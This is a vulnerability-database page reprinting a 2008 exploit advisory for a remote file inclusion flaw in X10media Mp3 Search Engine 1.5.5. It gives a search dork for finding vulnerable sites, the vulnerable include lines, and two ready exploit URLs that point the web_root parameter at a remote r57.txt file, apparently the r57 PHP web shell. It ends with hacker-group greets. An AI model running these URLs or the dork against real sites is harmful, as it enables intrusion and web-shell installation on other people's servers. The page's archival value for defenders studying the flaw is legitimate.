Lucene search

K

X10media Mp3 Search Engine 1.5.5 Remote File Inclusion Vulnerability

🗓️ 18 Sep 2008 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 9 Views

X10media Mp3 Search Engine 1.5.5 Remote File Inclusion Vulnerability Found by THUNDE

Show more
Code

                                                ################## THUNDER #########################################################
#
#
#    X10media Mp3 Search Engine v1.5.5 Remote File Inclusion Vulnerability
#
#    Founded by : THUNDER <t4h[at]hotmail.fr>
#    Dork: "This search engine is in no way intended for illegal downloads."
#
##### Vuln Code: ###################################################################
#
# file : /includes/function_core.php
#  -88.- include ($web_root."js/Mp3Player.php");
#
#-----------------------------------------------------------------
#
# file : /templates/layout_lyrics.php
#  .5.- include ($web_root."includes/function_list.php");
#
###### Exploit #####################################################################
#
#   http://www.target.com/[path]/includes/function_core.php?web_root=http://127.0.0.1/r57.txt?
#
#   http://www.target.com/[path]/templates/layout_lyrics.php?web_root=http://127.0.0.1/r57.txt?           
#         
#
#
###### Greets #######################################################################
#
#   MoRoCcan InjEctor5 Te4m and All Hackers
#
####################################################################################
                              

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo